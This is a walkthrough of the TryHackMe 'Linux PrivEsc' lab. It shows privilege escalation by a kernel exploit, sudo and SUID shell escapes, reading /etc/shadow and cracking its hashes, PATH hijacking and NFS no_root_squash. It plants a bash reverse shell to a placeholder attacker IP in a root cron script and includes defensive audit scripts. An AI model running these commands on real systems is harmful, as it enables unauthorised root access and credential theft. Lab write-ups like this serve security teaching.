Linux PrivEsc
This is my walkthrough for the TryHackMe Room: Linux PrivEsc.
Last updated
This room can be found on TryHackMe. It covers a few methods of escalating from a normal user to the root user on a system.
This task has us launch a machine and access it via the browser, or SSH into the machine with the username karen and password Password1.
Enumeration is typically one of the first steps you take when gaining access to a system.
wade7363 - We run hostname to find our answer.
3.13.0-24-generic - We can run uname -a to find this info.
Ubuntu 14.04 LTS - We can run cat /etc/issue or cat /etc/os-release to find this info.
2.7.6 - Running python -V will show this info.
This task has us use a vulnerability (found in Task 3) to exploit the machine and gain access to the root account. We will obtain a .c exploit file, get it onto our victim machine, compile it, run it, and become root.
THM-28392872729920 - After downloading the .c exploit file from Task 3, we can get it onto our victim machine however we can. A common way is via a Python web server.
Now we can wget the file to the /tmp/ directory on the victim.
Now we need to compile the code with gcc pwn.c -o pwned and execute the new file with ./pwned.
We verify we have escalated our privileges and are the root user with whoami. We should see root.
To find the flag I ran find / -name flag*.txt.
We can now cat the file to receive our flag.
3 - We can run sudo -l to find this answer. She has access to find, less, and nano.
So let's run sudo find . -exec /bin/sh \; -quit and see if we get root.
We do! So now we can find our flag.
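On the defensive side, the thing to audit is the sudoers file itself. The script below is an added example (not part of the room or of this walkthrough): it parses a file in sudoers syntax and reports every rule that grants a binary with a known shell escape, using the binaries this write-up abuses (find, less, nano, vim, nmap) as its list. The file path it reads and the sample data in its comments are assumptions.

```shell
#!/bin/sh
# Added example (not part of the TryHackMe room or this walkthrough): audit a
# sudoers-format file for rules that hand out binaries with known shell escapes.
# The list below is deliberately limited to the binaries abused in this write-up;
# extend it from your own baseline.
SHELL_ESCAPE_BINS="find less nano vim nmap"

# audit_sudoers FILE
# Prints one "user:binary" line per risky rule. Comment, blank and Defaults
# lines are skipped; "(runas)" and "NOPASSWD:" tags are stripped so only the
# command list is inspected. A rule granting ALL is reported as "user:ALL".
audit_sudoers() {
    grep -v '^[[:space:]]*#' "$1" | grep -v '^[[:space:]]*$' | grep -v '^[[:space:]]*Defaults' |
    while read -r user rest; do
        # rest looks like "ALL=(ALL) NOPASSWD: /usr/bin/find, /usr/bin/less"
        cmds=$(printf '%s' "$rest" | sed 's/^[^=]*=//; s/([^)]*)//g; s/NOPASSWD://g; s/PASSWD://g')
        printf '%s\n' "$cmds" | tr ',' '\n' | while read -r cmd; do
            # The first token is the program; arguments (if any) are ignored here.
            prog=$(printf '%s' "$cmd" | awk '{print $1}')
            if [ -z "$prog" ]; then continue; fi
            base=$(basename "$prog")
            if [ "$base" = "ALL" ]; then
                printf '%s:ALL\n' "$user"
                continue
            fi
            for risky in $SHELL_ESCAPE_BINS; do
                if [ "$base" = "$risky" ]; then
                    printf '%s:%s\n' "$user" "$base"
                fi
            done
        done
    done
    return 0
}

# count_risky_sudo_rules FILE: number of risky rules, usable as an audit gate.
count_risky_sudo_rules() {
    audit_sudoers "$1" | grep -c .
}

# Stand-alone use: sh audit_sudoers.sh /etc/sudoers (run as root; sudoers is 0440).
if [ "$#" -gt 0 ]; then
    audit_sudoers "$1"
fi
```

A hit means the rule should go, or be narrowed to a wrapper script that never passes through -exec, an editor or an interactive prompt. Once find is no longer runnable as root, the one-liner above simply runs as the calling user.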
$6$2.sUUDsOLIpXKxcr$eImtgFExyr2ls4jsghdD3DHLHHP9X50Iv.jNmwo/BJpphrPRJWjelWEz2HH.joV14aDEwW1c3CahzB1uaqeLR1 - The /etc/shadow file contains information about a Linux system's users, their password hashes, and more. So if we cat that file, we can get frank's password hash.
gerryconway - As in Task 6, we could list users and passwords using /etc/shadow, except we don't have permission to read it. There is another file we can view though: /etc/passwd.
Be sure to copy the contents of the /etc/passwd file to a .txt file.
The GTFOBins entry for base64 basically says that if we assign the variable LFILE to a file, then use base64 to encode and then decode that file, we can read it. Since we are after the password for the user, we want to see the /etc/shadow file.
LFILE=/etc/shadow
base64 "$LFILE" | base64 --decode
Now we can use unshadow from the John the Ripper package to combine the files.
Time to crack the passwords!
john --wordlist=(WORDLIST.TXT) (FILE.TXT)
THM-3847834 - Since we can read files as root using the SUID base64 binary, we can find this with the same method.
Running find / -name flag3.txt reveals it is under /home/ubuntu/, so cd to that directory.
This task focuses on capabilities to gain root access. Root gives Karen access to use vim, but that is all. This shows us how that can be leveraged to become root.
6 - Running getcap -r / 2>/dev/null will give us our answer. If we ran this without the 2>/dev/null we would also see a lot of errors on screen.
After testing the first 2 shell options, I found the 3rd option worked: ./vim -c ':py3 import os; os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'. Running THIS vim rather than the one inside of /usr/bin/ will get us our root shell.
THM-9349843 - After obtaining root, we can find the file location and cat it, obtaining our answer.
In this task we figure out how to leverage cron jobs (scheduled tasks) to become root.
4 - We can look at /etc/crontab to find this answer. This file is readable by any user.
THM-383000283 - If we ls we see we have a backup.sh file, which is also in our crontab. We can look at the contents of the backup.sh file and also make a backup of it with cp backup.sh backup.sh.bak. Looking at the original with ls -l, we notice it is not executable, so let's fix that with chmod +x backup.sh. We can edit the .sh file and add in a reverse shell command.
bash -i >& /dev/tcp/<OUR_MACHINE_IP>/<PORT> 0>&1
In another terminal we can start our netcat listener.
Now we wait for the crontab to run. After a minute or two, we should receive our root shell.
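The weakness here is not cron, it is a root job pointing at a script that a normal user can edit. The following script is an added example (not part of the room or this walkthrough) that audits a crontab in the system layout for exactly that: scripts writable by group or others, scripts that do not exist yet, and commands given by a relative name. The crontab path is whatever you pass it; the sample in the test is constructed.

```shell
#!/bin/sh
# Added example (not part of the room or this walkthrough): audit a system
# crontab for jobs whose script can be modified by someone other than its
# owner, which is the weakness Task 9 exploits (a root job running a writable
# backup.sh). Works on a file you point it at, so it can run against /etc/crontab
# or a copy pulled from a fleet.

# audit_cron_file FILE
# Understands the system crontab layout "m h dom mon dow user command" plus
# "@reboot user command" lines; variable assignments (SHELL=, PATH=) are skipped.
# Prints one WARN line per finding and returns 0 so it can sit in a pipeline.
# Debian-style "cd / && run-parts ..." lines show up as a relative-command WARN;
# that is noise worth seeing once and then whitelisting.
audit_cron_file() {
    grep -v '^[[:space:]]*#' "$1" | grep -v '^[[:space:]]*$' |
    while read -r min hour dom mon dow user cmd; do
        case "$min" in *=*) continue ;; esac
        if [ "${min#@}" != "$min" ]; then
            # @reboot-style line: the fields shift left by four.
            cmd="$dom $mon $dow $user $cmd"
            user=$hour
        fi
        prog=$(printf '%s' "$cmd" | awk '{print $1}')
        if [ -z "$prog" ]; then continue; fi
        case "$prog" in
            /*) ;;
            *)  printf 'WARN:%s:%s: relative command, resolved through cron PATH\n' "$user" "$prog"
                continue ;;
        esac
        if [ ! -e "$prog" ]; then
            printf 'WARN:%s:%s: missing, anyone who can create it runs as %s\n' "$user" "$prog" "$user"
            continue
        fi
        # ls -ld columns 1-10 are the mode string; position 6 is group-write, 9 is other-write.
        mode=$(ls -ld "$prog" | cut -c1-10)
        case "$mode" in
            ?????w????|????????w?)
                printf 'WARN:%s:%s: writable by group or others (%s)\n' "$user" "$prog" "$mode" ;;
        esac
        dirmode=$(ls -ld "$(dirname "$prog")" | cut -c1-10)
        case "$dirmode" in
            ????????w?)
                printf 'WARN:%s:%s: parent directory is world-writable\n' "$user" "$prog" ;;
        esac
    done
    return 0
}

# Stand-alone use: sh audit_cron.sh /etc/crontab
if [ "$#" -gt 0 ]; then
    audit_cron_file "$1"
fi
```

The fix for a finding is to make the script root-owned with mode 755 (or 700) in a root-owned directory; the cron entry itself can stay. Monitoring /etc/crontab and the scripts it names for modification (auditd or a file-integrity tool) catches the edit made in this task as it happens.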
123456 - Running cat /etc/shadow | grep matt will give us his hash. Copy that to a .txt file and crack it.
/home/murdoch - Running find / -writable 2>/dev/null | grep home | cut -d "/" -f 2,3 | sort -u will show us our answer. So we have write access to murdoch's home folder.
THM-736628929 - The hint from the question with no answer is "You can add the writable directory to your user's PATH and create a file named "thm" that the "./test" executable will read. The "thm" file can simply be a "cat" command that will read the flag file."
First we need to locate the file.
Now we echo $PATH.
Now we add the folder we have write access to to our path with export PATH=/home/murdoch:$PATH.
Now we create a file called thm with the contents cat /home/matt/flag6.txt under /home/murdoch, then we change the permissions of the file with chmod 777 thm.
From here we can run ./test and obtain our flag.
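The root cause in this task is a privileged program calling a command by bare name, so whatever directory comes first in PATH wins. From the defender's side the cheap check is the PATH itself. The script below is an added example (not part of the room or this walkthrough) that reports the entries that make this hijack possible: empty or "." entries, relative entries, missing directories, and directories writable by group or others. The PATH string it inspects is whatever you pass in.

```shell
#!/bin/sh
# Added example (not part of the room or this walkthrough): report PATH entries
# that allow the hijack shown in Task 10, where a writable directory is placed
# ahead of the real one. Pass a PATH string; defaults to the caller's $PATH.

# audit_path [PATHSTRING]
# Prints one WARN line per risky entry and returns 0; count the WARN lines to
# gate on the result.
audit_path() {
    pathstr=${1:-$PATH}
    printf '%s\n' "$pathstr" | tr ':' '\n' | while read -r entry; do
        # An empty entry ("a::b" or a trailing colon) means the current directory.
        if [ -z "$entry" ] || [ "$entry" = "." ]; then
            printf 'WARN:current directory is on PATH\n'
            continue
        fi
        case "$entry" in
            /*) ;;
            *)  printf 'WARN:relative entry %s\n' "$entry"
                continue ;;
        esac
        if [ ! -d "$entry" ]; then
            printf 'WARN:missing directory %s\n' "$entry"
            continue
        fi
        # ls -ld mode string: position 6 is group-write, position 9 is other-write.
        mode=$(ls -ld "$entry" | cut -c1-10)
        case "$mode" in
            ?????w????|????????w?)
                printf 'WARN:writable by group or others %s (%s)\n' "$entry" "$mode" ;;
        esac
    done
    return 0
}

# Stand-alone use: sh audit_path.sh "$PATH", or pass a candidate value such as
# "/home/murdoch:/usr/bin" to see what the task's export would have reported.
if [ "$#" -gt 0 ]; then
    audit_path "$1"
fi
```

This only covers the environment side. The lasting fix is in the privileged program: call helpers by absolute path, or reset PATH to a fixed value before running anything, so an attacker-controlled export PATH has nothing to influence.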
3 - Running showmount -e (IP) will give us our answer.
3 - Running cat /etc/exports will give us our answer. This checks the NFS configuration.
THM-89384012 - We can now mount the NFS share onto our machine with mount -o rw (IP):(FOLDER) (FOLDER_ON_OUR_MACHINE).
The room gives us an executable we can run on the machine. I made a file nfs.c with the contents given by the room.
Now we can compile it with gcc nfs.c -o nfs -w. Change the permissions of the file with chmod +s nfs.
We can now execute the file on the target machine from the tmp directory, cd /tmp && ./nfs, and obtain root. We can then obtain our flag with cat /home/matt/flag7.txt.
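Everything in this task hinges on one export option: no_root_squash keeps a remote root as uid 0 on the share, which is why a SUID file created over the mount runs as root on the server. The script below is an added example (not part of the room or this walkthrough) that audits an exports(5) file for that option and for shares open to any host; the file path is whatever you pass it and the sample in the test is constructed.

```shell
#!/bin/sh
# Added example (not part of the room or this walkthrough): audit an exports(5)
# file for the setting Task 11 relies on. no_root_squash lets a remote root user
# keep uid 0 on the share, so a SUID binary dropped there runs as root on the
# server; the default root_squash maps remote root to nobody. Also flags shares
# exported to every host.

# audit_exports FILE
# Each line is "<path> <client>(<opts>) [<client>(<opts>) ...]". Prints one WARN
# per finding and returns 0.
audit_exports() {
    grep -v '^[[:space:]]*#' "$1" | grep -v '^[[:space:]]*$' |
    while read -r share clients; do
        # One client spec per line; going through read avoids globbing on "*(rw)".
        printf '%s\n' "$clients" | tr ' \t' '\n\n' | while read -r spec; do
            if [ -z "$spec" ]; then continue; fi
            client=$(printf '%s' "$spec" | sed 's/(.*//')
            opts=$(printf '%s' "$spec" | sed -n 's/^[^(]*(\(.*\))$/\1/p')
            case ",$opts," in
                *,no_root_squash,*)
                    printf 'WARN:%s exported to %s with no_root_squash\n' "$share" "$client" ;;
            esac
            case "$client" in
                '*'|'')
                    printf 'WARN:%s exported to any host\n' "$share" ;;
            esac
        done
    done
    return 0
}

# Stand-alone use: sh audit_exports.sh /etc/exports
# On the client side, mounting with "-o nosuid" is the matching control: the
# SUID bit on files in the share is then ignored locally.
if [ "$#" -gt 0 ]; then
    audit_exports "$1"
fi
```

Dropping no_root_squash (or adding root_squash explicitly) and restricting the client list to the hosts that need the share removes the path used here; exporting with nosuid on the server side is an extra layer for shares that only hold data.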
User: leonard
Password: Penny123
This task utilizes a lot of the tools and methods we have used in the previous tasks. We can SSH into the machine and begin.
THM-42828719920544 - I started by looking at the SUID permissions.
We can see that base64 can be used. So as in Task 7, we can follow the same approach.
So let's try to cat the /etc/shadow file.
LFILE=/etc/shadow
base64 "$LFILE" | base64 --decode
We can get the hashes for root and missy.
root:$6$DWBzMoiprTTJ4gbW$g0szmtfn3HYFQweUPpSUCgHXZLzVii5o6PM0Q2oMmaDD9oGUSxe1yvKbnYsaSYHrUEQXTjIwOW/yrzV5HtIL51::0:99999:7:::
missy:$6$BjOlWE21$HwuDvV1iSiySCNpA3Z9LxkxQEqUAdZvObTxJxMoCp/9zRVCi6/zrlMlAQPAxfwaD2JCUypk4HaNzI3rPVqKHb/:18785:0:99999:7:::
We can put these hashes in a .txt file and attempt to crack them.
We got the password for missy! So let's switch users to missy with su missy.
sudo find / -name flag*.txt
We now have the location of our flags as well.
THM-168824782390238 - Sadly we don't have permission to read the 2nd flag, but let's see what sudo permissions missy has with sudo -l.
We see missy can run find. Similar to Task 6, we can use the GTFOBins entry we used for that.
sudo find . -exec /bin/sh \; -quit
We are now root and can cat the file for our final flag!
cat /home/rootflag/flag2.txt
CVE-2015-1328 - If we search our kernel version, 3.13.0-24-generic, on ExploitDB we find the exploit.
THM-402028394 - We can look on GTFOBins for ways to use the commands Karen does have access to run with sudo rights. Looking up find we see:
sudo nmap --interactive - Searching for nmap on GTFOBins will give us our answer.
Password1 - The room lets us know we can run find / -type f -perm -04000 -ls 2>/dev/null to find SUID permissions. After looking through this list and comparing it to GTFOBins, I find one that they have in common, base64.
View - Since we can see that Karen can use vim, we look through GTFOBins to see that we can escalate our privileges. If we ls we see karen has a vim file in her directory, but it's owned by root, which means we can leverage this to gain root.
We can use tools such as the one discussed in Task 4, but for now we'll go over the manual ways that were covered.